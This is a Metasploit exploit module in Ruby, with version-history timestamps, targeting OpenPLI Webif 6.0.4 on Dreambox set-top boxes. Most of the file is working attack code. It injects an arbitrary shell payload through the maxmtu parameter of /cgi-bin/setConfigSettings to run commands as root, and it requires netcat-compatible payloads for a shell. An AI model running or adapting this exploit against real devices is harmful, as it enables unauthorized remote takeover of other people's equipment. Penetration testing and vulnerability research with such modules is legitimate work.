metasploit-framework/modules/exploits/linux/http/dreambox_openpli_shell.rb

107 lines
2.6 KiB
Ruby
Raw Normal View History

2013-02-16 19:42:02 +00:00
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
# http://metasploit.com/
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
2013-02-16 19:49:32 +00:00
Rank = GreatRanking
2013-02-16 19:42:02 +00:00
include Msf::Exploit::Remote::Tcp
include Msf::Exploit::Remote::HttpClient
def initialize(info = {})
super(update_info(info,
'Name' => 'OpenPLI Webif v6.0.4 - Arbitrary Command Execution',
'Description' => %q{
Some Dream Boxes with OpenPLI v3 beta Images are vulnerable to OS Command injection.
Tested on the following box:
* Linux Kernel Linux version 2.6.9 (build@plibouwserver) (gcc version 3.4.4)
#1 Wed Aug 17 23:54:07 CEST 2011
* Firmware release 1.1.0, 27.01.2013
* FP Firmware 1.06
* Web Interface 6.0.4-Expert - PLi edition by [lite]
Note: This is a blind os command injection vulnerability. This means
that you will not see any output of your command. Try a ping command
to your local system for a first test.
},
'Author' => [ 'm-1-k-3' ],
'License' => MSF_LICENSE,
'References' =>
[
[ 'URL', 'http://openpli.org/' ],
[ 'URL', 'http://openpli.org/wiki/Webif' ],
[ 'URL', 'http://www.s3cur1ty.de/m1adv2013-007' ],
[ 'EDB', '24498' ],
2013-03-14 10:18:52 +00:00
[ 'BID', '57943' ],
2013-02-16 19:42:02 +00:00
[ 'OSVDB', '90230']
],
'Platform' => ['unix', 'linux'],
'Arch' => ARCH_CMD,
'Privileged' => true,
'Payload' =>
{
'Space' => 1024,
'DisableNops' => true,
'Compat' =>
{
'PayloadType' => 'cmd',
2013-03-14 10:18:52 +00:00
'RequiredCmd' => 'netcat generic'
2013-02-16 19:42:02 +00:00
}
},
'Targets' =>
[
[ 'Automatic Target', { }]
],
'DefaultTarget' => 0,
'DisclosureDate' => 'Feb 08 2013'
))
register_options(
[
Opt::RPORT(80),
], self.class)
end
def exploit
connect
payl = datastore['PAYLOAD']
2013-02-16 19:49:32 +00:00
uri = '/cgi-bin/setConfigSettings'
2013-02-16 19:42:02 +00:00
2013-03-14 10:18:52 +00:00
cmd = Rex::Text.uri_encode(payload.encoded)
2013-02-16 19:42:02 +00:00
vprint_status("#{rhost}:#{rport} - Sending remote command ... \nCommand: #{cmd}")
vprint_status("#{rhost}:#{rport} - Blind Exploitation - unknown Exploitation state\n")
data_cmd = "?maxmtu=1500%26#{cmd}%26"
begin
res = send_request_cgi(
{
'uri' => uri << data_cmd,
'method' => 'GET',
})
rescue ::Rex::ConnectionError, Errno::ECONNREFUSED, Errno::ETIMEDOUT
print_error("#{rhost}:#{rport} - HTTP Connection Failed, Aborting")
return
end
if not res
print_error("#{rhost}:#{rport} - HTTP Connection Error, Aborting")
return
end
handler
disconnect
end
end